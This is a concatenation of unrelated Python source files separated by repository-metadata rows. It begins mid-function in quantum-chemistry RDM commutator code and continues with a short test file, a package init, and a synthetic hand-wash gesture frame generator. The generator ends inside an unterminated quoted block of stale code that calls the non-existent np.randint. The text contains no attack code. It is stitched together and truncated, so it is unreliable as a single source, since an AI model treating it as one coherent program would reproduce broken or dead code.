                         tpdm[:, :, r, s], optimize=True)
        # kdelta(k,q) kdelta(l,p) cre(i) cre(j) des(r) des(s)
        val -= np.einsum('ij,ij', two_body_tensor[:, :, q, p],
                         tpdm[:, :, r, s], optimize=True)
        # Single-contraction terms against the 3-RDM.
        # kdelta(i,r) cre(j) cre(p) cre(q) des(k) des(l) des(s)
        val += np.einsum('jkl,jkl', two_body_tensor[r], d3[:, p, q, :, :, s],
                         optimize=True)
        # kdelta(i,s) cre(j) cre(p) cre(q) des(k) des(l) des(r)
        val -= np.einsum('jkl,jkl', two_body_tensor[s], d3[:, p, q, :, :, r],
                         optimize=True)
        # kdelta(j,r) cre(i) cre(p) cre(q) des(k) des(l) des(s)
        val -= np.einsum('ikl,ikl', two_body_tensor[:, r],
                         d3[:, p, q, :, :, s], optimize=True)
        # kdelta(j,s) cre(i) cre(p) cre(q) des(k) des(l) des(r)
        val += np.einsum('ikl,ikl', two_body_tensor[:, s],
                         d3[:, p, q, :, :, r], optimize=True)
        # kdelta(k,p) cre(i) cre(j) cre(q) des(l) des(r) des(s)
        val -= np.einsum('ijl,ijl', two_body_tensor[:, :, p, :],
                         d3[:, :, q, :, r, s], optimize=True)
        # kdelta(k,q) cre(i) cre(j) cre(p) des(l) des(r) des(s)
        val += np.einsum('ijl,ijl', two_body_tensor[:, :, q, :],
                         d3[:, :, p, :, r, s], optimize=True)
        # kdelta(l,p) cre(i) cre(j) cre(q) des(k) des(r) des(s)
        val += np.einsum('ijk,ijk', two_body_tensor[:, :, :, p],
                         d3[:, :, q, :, r, s], optimize=True)
        # kdelta(l,q) cre(i) cre(j) cre(p) des(k) des(r) des(s)
        val -= np.einsum('ijk,ijk', two_body_tensor[:, :, :, q],
                         d3[:, :, p, :, r, s], optimize=True)
        result[p, q, r, s] = val
    return result
def two_rdo_commutator_symm(two_body_tensor: np.ndarray, tpdm: np.ndarray,
                            d3: np.ndarray) -> np.ndarray:
    r"""
    Calculate <psi | [p^ q^ r s, A] | psi> for a two-body operator

    A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l

    where A^{ij}_{lk} is antisymmetric and hermitian, which collapses the
    twelve general contractions down to six with coefficient +/-2.

    Args:
        two_body_tensor: 4-tensor for the coefficients of A
        tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
        d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
    """
    dim = tpdm.shape[0]
    out = np.zeros((dim, dim, dim, dim), dtype=tpdm.dtype)
    # Swap the last two axes once, outside the quadruple loop.
    k2 = two_body_tensor.transpose(0, 1, 3, 2)
    for p, q, r, s in product(range(dim), repeat=4):
        elem = 0.
        # k2(p,q,a,b) cre(a) cre(b) des(r) des(s)
        elem -= 2. * np.einsum('ab,ab', k2[p, q], tpdm[:, :, r, s])
        # k2(r,s,a,b) cre(p) cre(q) des(a) des(b)
        elem += 2. * np.einsum('ab,ab', k2[r, s], tpdm[p, q])
        # k2(p,a,b,c) cre(q) cre(b) cre(c) des(r) des(s) des(a)
        elem += 2. * np.einsum('abc,bca', k2[p], d3[q, :, :, r, s, :])
        # k2(q,a,b,c) cre(p) cre(b) cre(c) des(r) des(s) des(a)
        elem -= 2. * np.einsum('abc,bca', k2[q], d3[p, :, :, r, s, :])
        # k2(r,a,b,c) cre(p) cre(q) cre(a) des(s) des(b) des(c)
        elem -= 2. * np.einsum('abc,abc', k2[r], d3[p, q, :, s, :, :])
        # k2(s,a,b,c) cre(p) cre(q) cre(a) des(r) des(b) des(c)
        elem += 2. * np.einsum('abc,abc', k2[s], d3[p, q, :, r, :, :])
        out[p, q, r, s] = elem
    return out
def two_rdo_commutator_antisymm(two_body_tensor: np.ndarray, tpdm: np.ndarray,
                                d3: np.ndarray) -> np.ndarray:
    r"""
    Calculate <psi | [p^ q^ r s, A] | psi> for a two-body operator

    A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l

    where A^{ij}_{lk} is antisymmetric and antihermitian.  Identical to the
    hermitian variant except for the signs of the first and the two
    'abc,bca' contractions.

    Args:
        two_body_tensor: 4-tensor for the coefficients of A
        tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
        d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
    """
    dim = tpdm.shape[0]
    out = np.zeros((dim, dim, dim, dim), dtype=tpdm.dtype)
    # Swap the last two axes once, outside the quadruple loop.
    k2 = two_body_tensor.transpose(0, 1, 3, 2)
    for p, q, r, s in product(range(dim), repeat=4):
        elem = 0.
        # k2(p,q,a,b) cre(a) cre(b) des(r) des(s)
        elem += 2. * np.einsum('ab,ab', k2[p, q], tpdm[:, :, r, s])
        # k2(r,s,a,b) cre(p) cre(q) des(a) des(b)
        elem += 2. * np.einsum('ab,ab', k2[r, s], tpdm[p, q])
        # k2(p,a,b,c) cre(q) cre(b) cre(c) des(r) des(s) des(a)
        elem -= 2. * np.einsum('abc,bca', k2[p], d3[q, :, :, r, s, :])
        # k2(q,a,b,c) cre(p) cre(b) cre(c) des(r) des(s) des(a)
        elem += 2. * np.einsum('abc,bca', k2[q], d3[p, :, :, r, s, :])
        # k2(r,a,b,c) cre(p) cre(q) cre(a) des(s) des(b) des(c)
        elem -= 2. * np.einsum('abc,abc', k2[r], d3[p, q, :, s, :, :])
        # k2(s,a,b,c) cre(p) cre(q) cre(a) des(r) des(b) des(c)
        elem += 2. * np.einsum('abc,abc', k2[s], d3[p, q, :, r, :, :])
        out[p, q, r, s] = elem
    return out
def one_rdo_commutator_symm(two_body_tensor: np.ndarray,
                            tpdm: np.ndarray) -> np.ndarray:
    r"""
    Calculate <psi | [p^ q, A] | psi> where A is a two-body operator

    A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l

    where A^{ij}_{lk} is antisymmetric and hermitian.

    Args:
        two_body_tensor: 4-tensor for the coefficients of A
        tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
    """
    dim = tpdm.shape[0]
    out = np.zeros((dim, dim), dtype=tpdm.dtype)
    # Swap the last two axes once, outside the loop.
    k2 = two_body_tensor.transpose(0, 1, 3, 2)
    for p, q in product(range(dim), repeat=2):
        elem = 0.
        # k2(p,a,b,c) cre(b) cre(c) des(q) des(a)
        elem += 2.0 * np.einsum('abc,bca', k2[p], tpdm[:, :, q, :])
        # k2(q,a,b,c) cre(p) cre(a) des(b) des(c)
        elem -= 2.0 * np.einsum('abc,abc', k2[q], tpdm[p])
        out[p, q] = elem
    return out
| 42.540436 | 87 | 0.512297 | 4,790 | 33,139 | 3.418163 | 0.062213 | 0.013559 | 0.012093 | 0.015147 | 0.901179 | 0.878397 | 0.870091 | 0.862151 | 0.848714 | 0.844805 | 0 | 0.048356 | 0.336643 | 33,139 | 778 | 88 | 42.595116 | 0.696447 | 0.217267 | 0 | 0.778234 | 0 | 0 | 0.016974 | 0.001022 | 0 | 0 | 0 | 0 | 0.004107 | 1 | 0.022587 | false | 0 | 0.022587 | 0 | 0.069815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3aa25b6ab9be152ab82eacd2419e7b82bfb67dc8 | 207 | py | Python | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | null | null | null | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | null | null | null | tests/test_tools.py | sneakers-the-rat/nwb-conversion-tools | 46a242f01ba80e489a1d4e89c8612036c7f04f56 | [
"BSD-3-Clause"
] | 1 | 2021-06-28T20:38:31.000Z | 2021-06-28T20:38:31.000Z | from nwb_conversion_tools.conversion_tools import check_regular_timestamps
def test_check_regular_timestamps():
    """check_regular_timestamps: evenly spaced is regular, uneven is not.

    Fix: the second assertion had unrelated dataset-metadata text fused onto
    the end of the line, corrupting the expression; restored the clean assert.
    """
    assert check_regular_timestamps([1, 2, 3])
    assert not check_regular_timestamps([1, 2, 4])
3aef7545354f7a3462b89a8d351049887dbd0b3d | 130 | py | Python | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | null | null | null | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | null | null | null | net_models/models/services/__init__.py | mihudec/netcm | 380786793e35206cae923e613458be9eb9f0a02e | [
"MIT"
] | 1 | 2021-08-09T06:33:28.000Z | 2021-08-09T06:33:28.000Z | from .ServerModels import *
from .cisco_ios.AaaMethods import *
from .cisco_ios.IosLineModels import *
from .NetworkClock import * | 32.5 | 38 | 0.807692 | 16 | 130 | 6.4375 | 0.5 | 0.291262 | 0.291262 | 0.349515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 130 | 4 | 39 | 32.5 | 0.895652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c9147e1520c8ffec3dead9254adb6d6bcc9b4ec6 | 31,344 | py | Python | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | 1 | 2020-06-17T12:49:34.000Z | 2020-06-17T12:49:34.000Z | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | null | null | null | HandWashNet1/dbGenerate.py | ucrscholar/HandWashNet | 2a01099b9d054956fd335ec4de6aff2064d5ef4e | [
"MIT"
] | null | null | null | import math
from math import pi
import numpy as np
from matplotlib import pyplot
from sklearn.preprocessing import LabelEncoder
#from tensorflow_core.python.keras.utils import to_categorical
import random
from tensorflow_core.python.keras.utils.np_utils import to_categorical
def generate_DampedSin(period, i, decay, amplify=1):
    """Sample one point [phase, value] of a damped sine wave.

    phase is i / period; value is a sine of amplitude ``amplify`` centred on
    0.5 and attenuated by exp(-decay * i).
    """
    phase = i / period
    envelope = np.exp(-decay * i)
    value = 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period) * envelope
    return [phase, value]
def generate_DampedSinDuration(period, i, decay, amplify=1):
    """Damped-sine sample, or the sentinel [-1, -1] past two periods."""
    if i > 2 * period:
        # The gesture has finished; signal "no point".
        return [-1, -1]
    value = 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period) * np.exp(-decay * i)
    return [i / period, value]
def generate_sin(period, i, decay=0, amplify=1):
    """Sample one point [phase, value] of an undamped sine wave.

    ``decay`` is accepted only for signature parity with the damped variants
    and is ignored.
    """
    value = 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period)
    return [i / period, value]
def generate_sinDuration(period, i, decay=0, amplify=1):
    """Sine sample, or the sentinel [-1, -1] once i has passed one period."""
    if i <= period:
        return [i / period, 0.5 + 0.5 * amplify * np.sin(2 * pi * i / period)]
    return [-1, -1]
def generate_circle(period, i, decay=0, radius=1, x0=0, y0=0):
    """Sample point i of a circle of radius ``radius`` offset by (x0, y0).

    The raw cos/sin values are shifted into [0, 2R] then rescaled by R / 2
    before the offset is applied.  ``decay`` is unused and kept only for
    signature parity with the other generators.

    Fixes: the original called the non-existent ``np.uniform`` (AttributeError
    at runtime) and built two throw-away 1000-sample lists; both were dead
    code whose results were never read, so they have been removed.
    """
    R = radius
    x = (R * np.cos(2 * pi * i / period) + R) / 2 * R + x0
    y = (R * np.sin(2 * pi * i / period) + R) / 2 * R + y0
    return [x, y]
def generate_circleDuration(period, i, decay=0, radius=1, x0=0, y0=0):
    """Circle sample like generate_circle, with a [-1, -1] sentinel once
    ``i`` exceeds one period.

    Fixes: the original crashed before returning — ``np.uniform`` does not
    exist, and the local name ``max`` was used as the builtin before being
    assigned (UnboundLocalError).  All of that code was dead (its results
    were never read) and has been removed.
    """
    if i > period:
        # Gesture finished; signal "no point".
        return [-1, -1]
    R = radius
    x = (R * np.cos(2 * pi * i / period) + R) / 2 * R + x0
    y = (R * np.sin(2 * pi * i / period) + R) / 2 * R + y0
    return [x, y]
def generate_Heart(period, i, decay):
    """Sample point i of a parametric heart curve, normalised into [0, 1]^2.

    The curve x = 16 sin^3 t, y = 13 cos t - 5 cos 2t - 2 cos 3t - cos 4t is
    evaluated on a 1000-point grid over one period to find its bounding box,
    then the requested point is min-max normalised against that box.
    ``decay`` is unused and kept for signature parity.

    Fixes: removed dead calls to the non-existent ``np.randint`` /
    ``np.uniform`` (AttributeError at runtime); their results were never used.
    """
    xs = list()
    ys = list()
    # Dense sweep to establish the curve's bounding box for normalisation.
    for t in range(1000):
        t = t / 1000.0
        t = 2 * pi * t / period
        xs.append(16 * pow(np.sin(t), 3))
        ys.append(13 * np.cos(t) - 5 * np.cos(2 * t) - 2 * np.cos(3 * t) -
                  np.cos(4 * t))
    mix, maxx = min(xs), max(xs)
    miy, may = min(ys), max(ys)
    i = 2 * pi * i / period
    x = 16 * pow(np.sin(i), 3)
    y = 13 * np.cos(i) - 5 * np.cos(2 * i) - 2 * np.cos(3 * i) - np.cos(4 * i)
    x = (x - mix) / (maxx - mix)
    y = (y - miy) / (may - miy)
    return [x, y]
def generate_HeartDuration(period, i, decay):
    """generate_Heart with a [-1, -1] sentinel once ``i`` exceeds ``period``.

    Fixes: removed crashing dead code (``np.randint``/``np.uniform`` do not
    exist) and the local ``max`` that shadowed the builtin — the original
    raised UnboundLocalError before it could return.  The sentinel check is
    hoisted before the bounding-box sweep since the sweep's result is not
    needed in that branch.
    """
    if i > period:
        return [-1, -1]
    xs, ys = list(), list()
    # Dense sweep to establish the curve's bounding box for normalisation.
    for t in range(1000):
        t = t / 1000.0
        t = 2 * pi * t / period
        xs.append(16 * pow(np.sin(t), 3))
        ys.append(13 * np.cos(t) - 5 * np.cos(2 * t) - 2 * np.cos(3 * t) -
                  np.cos(4 * t))
    mix, maxx = min(xs), max(xs)
    miy, may = min(ys), max(ys)
    i = 2 * pi * i / period
    x = 16 * pow(np.sin(i), 3)
    y = 13 * np.cos(i) - 5 * np.cos(2 * i) - 2 * np.cos(3 * i) - np.cos(4 * i)
    return [(x - mix) / (maxx - mix), (y - miy) / (may - miy)]
# generate input and output pairs of damped sine waves
def generate_examplesX(length, n_patterns, output):
    """Build ``n_patterns`` stub (X, y) pairs from a fixed [0, 1] sequence.

    The damped-sine generation is stubbed out: every pattern uses the
    constant sequence [0, 1], split into everything but the last ``output``
    values (X) and the last ``output`` values (y), then reshaped to
    (n_patterns, length, 1) and (n_patterns, output).
    NOTE(review): the reshape only succeeds when length/output are
    consistent with the 2-element stub sequence — confirm intended sizes.

    Fixes: removed calls to the non-existent ``np.randint``/``np.uniform``
    (AttributeError at runtime); their results were never used.
    """
    X, y = list(), list()
    for _ in range(n_patterns):
        sequence = [0, 1]  # generate_sequenceDampedSin(length + output, p, d)
        X.append(sequence[:-output])
        y.append(sequence[-output:])
    X = np.array(X).reshape(n_patterns, length, 1)
    y = np.array(y).reshape(n_patterns, output)
    return X, y
# test problem generation
# X, y = generate_examples(20, 5, 5)
# for i in range(len(X)):
# pyplot.plot([x for x in X[i, :, 0]] + [x for x in y[i]],'-o')
# pyplot.show()
###########################################################################################
# generate the next frame in the sequence
def next_frame(last_step, last_frame, column):
    """Random-walk the dot by at most one row and draw it in ``column``.

    Returns (frame, step): a copy of ``last_frame`` with a 1 written at
    (step, column), where step is drawn from the window
    [last_step - 1, last_step + 1] clamped to the frame.

    Fix: ``np.randint`` does not exist (AttributeError); use
    ``np.random.randint``.  Its upper bound is exclusive, so +1 keeps the
    window inclusive and avoids ValueError when lower == upper at the edges.
    """
    # define the scope of the next step
    lower = max(0, last_step - 1)
    upper = min(last_frame.shape[0] - 1, last_step + 1)
    # choose the row index for the next step
    step = np.random.randint(lower, upper + 1)
    # copy the prior frame and add the new step
    frame = last_frame.copy()
    frame[step, column] = 1
    return frame, step
def generateFrame(row, column, last_frame):
    """Return a copy of ``last_frame`` with a 1 drawn at (row, column).

    Coordinates past the bottom/right edge are clamped to the last valid
    index.  The pixel is skipped only when BOTH coordinates are negative;
    a single negative coordinate indexes from the end, as in the original.
    The second return value is always 0.

    Fix: removed the unused lower/upper random-walk window computation left
    over from next_frame.
    """
    if row > last_frame.shape[0] - 1:
        row = last_frame.shape[0] - 1
    if column > last_frame.shape[1] - 1:
        column = last_frame.shape[1] - 1
    frame = last_frame.copy()
    if row >= 0 or column >= 0:
        frame[row, column] = 1
    return frame, 0
def next_frameSin(row, last_frame, column):
    """Draw one pixel of the sine trajectory into a copy of ``last_frame``.

    High out-of-range coordinates are clamped to the last index; the draw is
    skipped only when both coordinates are negative.  Step is always 0.

    Fix: removed the unused lower/upper window computation (dead code copied
    from the random-walk helper).
    """
    row = min(row, last_frame.shape[0] - 1)
    column = min(column, last_frame.shape[1] - 1)
    frame = last_frame.copy()
    if row >= 0 or column >= 0:
        frame[row, column] = 1
    return frame, 0
def next_frameDampedSin(row, last_frame, column):
    """Draw one pixel of the damped-sine trajectory into a frame copy.

    Identical plotting rule to next_frameSin: clamp high coordinates, skip
    only when both are negative, always return step 0.

    Fix: removed the unused lower/upper window computation (dead code).
    """
    row = min(row, last_frame.shape[0] - 1)
    column = min(column, last_frame.shape[1] - 1)
    frame = last_frame.copy()
    if row >= 0 or column >= 0:
        frame[row, column] = 1
    return frame, 0
def next_frameDampedCircle(row, last_frame, column):
    """Draw one pixel of the circle trajectory into a frame copy.

    Same plotting rule as the other next_frame* helpers: clamp high
    coordinates, skip only when both are negative, always return step 0.

    Fix: removed the unused lower/upper window computation (dead code).
    """
    row = min(row, last_frame.shape[0] - 1)
    column = min(column, last_frame.shape[1] - 1)
    frame = last_frame.copy()
    if row >= 0 or column >= 0:
        frame[row, column] = 1
    return frame, 0
def next_frameDampedHeart(row, last_frame, column):
    """Draw one pixel of the heart trajectory into a frame copy.

    Same plotting rule as the other next_frame* helpers: clamp high
    coordinates, skip only when both are negative, always return step 0.

    Fix: removed the unused lower/upper window computation (dead code).
    """
    row = min(row, last_frame.shape[0] - 1)
    column = min(column, last_frame.shape[1] - 1)
    frame = last_frame.copy()
    if row >= 0 or column >= 0:
        frame[row, column] = 1
    return frame, 0
# generate a sequence of frames of a dot moving across an image
def build_frames(size, timeStep=0):
    """Build one labelled sequence of four hand-wash gesture segments.

    Each segment draws a different trajectory (sine, damped sine, circle,
    heart) into cumulative (size, size) frames, with a blank separator frame
    between segments.  Returns (frames, labels) with one label per segment.

    Fixes: ``np.randint`` does not exist and ``np.random`` is a module, not
    a callable — both raised at runtime.  Replaced with
    ``np.random.randint`` / ``np.random.random``, the spelling used
    elsewhere in this file.  Commented-out dead code removed.
    """
    frames = list()
    labelA = list()
    # create the first (empty) frame; step/right are drawn but the pixel is
    # written as 0, so the frame stays blank as in the original
    frame = np.zeros((size, size))
    step = np.random.randint(0, size - 1)
    # decide if we are heading left or right
    right = 1 if np.random.random() < 0.5 else 0
    col = 0 if right else size - 1
    frame[step, col] = 0
    frames.append(frame)

    # Segment 1: plain sine trajectory.
    amplify = np.random.randint(5, 10) / 10.0
    xratio = np.random.randint(1, 4)
    yratio = np.random.randint(1, 4)
    labelA.append('NailWashLeft')
    for i in range(1, size):
        i = i / float(size)
        column, row = generate_sin(1, i, amplify=amplify)
        frame, step = next_frameSin(int(row * size / xratio), frame,
                                    int(column * size / yratio))
        frames.append(frame)
    frame = np.zeros((size, size))
    frames.append(frame)

    # Segment 2: damped sine trajectory.
    amplify = np.random.randint(5, 20) / 10.0
    xratio = np.random.randint(1, 4)
    yratio = np.random.randint(1, 4)
    labelA.append('NailWashRight')
    for i in range(1, size):
        i = i / float(size)
        column, row = generate_DampedSin(0.5, i, 3, amplify=amplify)
        frame, step = next_frameDampedSin(int(row * size / xratio), frame,
                                          int(column * size / yratio))
        frames.append(frame)
    frame = np.zeros((size, size))
    frames.append(frame)

    # Segment 3: circle trajectory.
    radius = np.random.randint(5, 7) / 10
    xratio = np.random.randint(1, 3)
    yratio = np.random.randint(1, 3)
    x0 = np.random.randint(2, 3) / 10
    y0 = np.random.randint(2, 3) / 10
    labelA.append('ThumbFingureWash')
    for i in range(1, size):
        i = float(i) / float(size)
        column, row = generate_circle(1, i, 0.5, radius=radius, x0=x0, y0=y0)
        frame, step = next_frameDampedCircle(int(row * size / xratio), frame,
                                             int(column * size / yratio))
        frames.append(frame)
    frame = np.zeros((size, size))
    frames.append(frame)

    # Segment 4: heart trajectory.
    radius = np.random.randint(5, 7) / 10  # drawn but unused by generate_Heart
    xratio = np.random.randint(1, 3)
    yratio = np.random.randint(1, 3)
    labelA.append('ForeFingureWash')
    for i in range(1, size):
        i = float(i) / float(size)
        column, row = generate_Heart(1, i, 0.5)
        frame, step = next_frameDampedHeart(int(row * size / xratio), frame,
                                            int(column * size / yratio))
        frames.append(frame)
    return frames, labelA
def GestureA(size, period=100, type=0):
    """Render a single-period sine sweep as a sequence of one-hot frames.

    type 0 uses fixed subsampling/scaling; types 1 and 2 randomise the
    horizontal stride, vertical scale and vertical offset.  Returns
    (frames, ['GestureA']) where each frame is a (size, size) int array
    containing exactly one lit pixel (the last sample point is skipped).
    """
    frames = list()
    labelA = list()
    # Drawn for RNG-stream compatibility with the other gestures; unused.
    amplify = np.random.randint(5, 10) / 10.0
    xratio = 2  # rang(1,5)
    yratio = 1  # rang(0.1,1,0.1)
    zratio = size - yratio * size  # rang(0,size - yratio* size)
    if type in (1, 2):
        xratio = np.random.randint(3, 5)  # rang(1,5)
        yratio = np.random.randint(1, 10) / 10.0  # rang(0.1,1,0.1)
        zratio = np.random.randint(0, size - yratio * size)
    labelA.append('GestureA')
    # Dense sine trajectory in a 100x100 source coordinate system.
    xs = [i for i in range(0, period)]
    ys = [50 + 50 * np.sin(2 * pi * i / period) for i in range(0, period)]
    # Subsample every xratio-th point and rescale into frame coordinates.
    cols = [xs[i] / 100 * (size - 1) for i in range(0, period, xratio)]
    rows = [ys[i] / 100 * (size - 1) * yratio + zratio
            for i in range(0, period, xratio)]
    for idx, (cc, rr) in enumerate(zip(cols, rows)):
        if idx < len(cols) - 1:
            frame = np.zeros((size, size), dtype=int)
            frame[math.floor(rr), math.floor(cc)] = 1
            frames.append(frame)
    return frames, labelA
def GestureB(size, period=100, type=0):
    """Render a damped double-frequency sine sweep as one-hot frames.

    Same parameterisation as GestureA, but the sine runs at half the period
    and is attenuated by exp(-0.03 i).  Every subsampled point produces one
    frame.  Returns (frames, ['GestureB']).
    """
    frames = list()
    labelA = list()
    # Drawn for RNG-stream compatibility; unused in the trajectory itself.
    amplify = np.random.randint(5, 10) / 10.0
    xratio = 2  # range(2,5)
    yratio = 0.5  # range(0.1,1,0.1)
    zratio = size - yratio * size  # rang(0,size - yratio* size)
    if type in (1, 2):
        xratio = np.random.randint(3, 5)
        yratio = np.random.randint(1, 10) / 10.0
        zratio = np.random.randint(0, size - yratio * size)
    decay = 0.03
    labelA.append('GestureB')
    # Dense damped-sine trajectory in a 100x100 source coordinate system.
    xs, ys = list(), list()
    for i in range(0, period):
        xs.append(i)
        ys.append(50 + 50 * np.sin(2 * pi * i / (period / 2)) *
                  np.exp(-decay * i))
    # Subsample, rescale, and plot one pixel per frame.
    for i in range(0, period, xratio):
        cc = xs[i] / 100 * (size - 1)
        rr = ys[i] / 100 * (size - 1) * yratio + zratio
        frame = np.zeros((size, size))
        frame[math.floor(rr), math.floor(cc)] = 1
        frames.append(frame)
    return frames, labelA
def GestureC(size, period=100, type=0):
    """Render one revolution of a circle as a sequence of one-hot frames.

    type 0 uses a fixed radius of 50 in the 100x100 source coordinate
    system; types 1 and 2 additionally randomise the radius along with the
    stride/scale/offset.  Returns (frames, ['GestureC']).
    """
    frames = list()
    labelA = list()
    # Drawn for RNG-stream compatibility; unused in the trajectory itself.
    amplify = np.random.randint(5, 10) / 10.0
    xratio = 2
    yratio = 1
    R = 50
    zratio = size - yratio * size  # rang(0,size - yratio* size)
    if type in (1, 2):
        xratio = np.random.randint(3, 5)
        yratio = np.random.randint(1, 10) / 10.0
        zratio = np.random.randint(0, size - yratio * size)
        R = np.random.randint(40, 50)
    labelA.append('GestureC')
    # Dense circular trajectory centred at (R, R).
    xs, ys = list(), list()
    for i in range(0, period):
        xs.append(R * np.cos(2 * pi * i / period) + R)
        ys.append(R * np.sin(2 * pi * i / period) + R)
    # Subsample, rescale, and plot one pixel per frame.
    for i in range(0, period, xratio):
        cc = xs[i] / 100 * (size - 1)
        rr = ys[i] / 100 * (size - 1) * yratio + zratio
        frame = np.zeros((size, size))
        frame[math.floor(rr), math.floor(cc)] = 1
        frames.append(frame)
    return frames, labelA
def GestureD(size, period=100, type=0):
    """Render a triangle (zig-zag) wave as a sequence of one-hot frames.

    The wave has amplitude A=100 and half-period P=25 in source
    coordinates.  Note the pixel is written with (x, y) indexing and the
    frame is transposed before being appended, matching the other gestures'
    (row, col) convention.  Returns (frames, ['GestureD']).
    """
    frames = list()
    labelA = list()
    # Drawn for RNG-stream compatibility; unused in the trajectory itself.
    amplify = np.random.randint(5, 10) / 10.0
    xratio = 2  # range(1,5)
    yratio = 1  # rang(0.1,1.0.1)
    A = 100
    P = 25
    zratio = size - yratio * size  # rang(0,size - yratio* size)
    if type in (1, 2):
        xratio = np.random.randint(3, 5)
        yratio = np.random.randint(1, 10) / 10.0
        zratio = np.random.randint(0, size - yratio * size)
    labelA.append('GestureD')
    # Dense triangle-wave trajectory.
    xs, ys = list(), list()
    for i in range(0, period):
        xs.append(i)
        ys.append((A / P) * (P - abs(i % (2 * P) - P)))
    # Subsample, rescale, plot with (x, y) indexing, then transpose.
    for i in range(0, period, xratio):
        cc = xs[i] / 100 * (size - 1)
        rr = ys[i] / 100 * (size - 1) * yratio + zratio
        frame = np.zeros((size, size))
        frame[math.floor(cc), math.floor(rr)] = 1
        frames.append(frame.T)
    return frames, labelA
def GestureBackground(size, period=5, type=0):
    """Return ``period`` all-zero (size, size) frames labelled 'Background'.

    ``type`` is accepted only for signature parity with the gesture
    generators and is ignored.
    """
    frames = [np.zeros((size, size)).T for _ in range(0, period)]
    return frames, ['Background']
'''
def GenNailLeftDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
step = np.randint(0, size - 1)
# decide if we are heading left or right
right = 1 if np.random() < 0.5 else 0
col = 0 if right else size - 1
frame[step, col] = 0
frames.append(frame)
amplify = np.randint(5, 10) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
duration = np.randint(5, 10) / 10
labelA.append('NailWashLeft')
for i in range(1, size):
i = i / float(size)
column, row = generate_sinDuration(duration, i, amplify=amplify)
frame = np.zeros((size, size))
frame, step = next_frameSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashLeft')
# drawImage(frame)
return frames, labelA
def GenNailRight(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
amplify = np.randint(5, 20) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
labelA.append('NailWashRight')
for i in range(1, size):
i = i / float(size)
column, row = generate_DampedSin(0.5, i, 3, amplify=amplify)
# frame = np.zeros((size, size))
frame, step = next_frameDampedSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashRight')
return frames, labelA
def GenNailRightDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
amplify = np.randint(5, 20) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
duration = np.randint(3, 8) / 10
labelA.append('NailWashRight')
for i in range(1, size):
i = i / float(size)
column, row = generate_DampedSinDuration(duration, i, 3, amplify=amplify)
frame = np.zeros((size, size))
frame, step = next_frameDampedSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashRight')
# drawImage(frame)
return frames, labelA
def GenThumbFinger(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
x0 = np.randint(2, 3) / 10
y0 = np.randint(2, 3) / 10
labelA.append('ThumbFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_circle(1, i, 0.5, radius=radius, x0=x0, y0=y0)
# frame = np.zeros((size, size))
frame, step = next_frameDampedCircle(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ThumbFingureWash')
return frames, labelA
def GenThumbFingerDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
x0 = np.randint(2, 3) / 10
y0 = np.randint(2, 3) / 10
duration = np.randint(3, 10) / 10
labelA.append('ThumbFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_circleDuration(duration, i, 0.5, radius=radius, x0=x0, y0=y0)
frame = np.zeros((size, size))
frame, step = next_frameDampedCircle(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ThumbFingureWash')
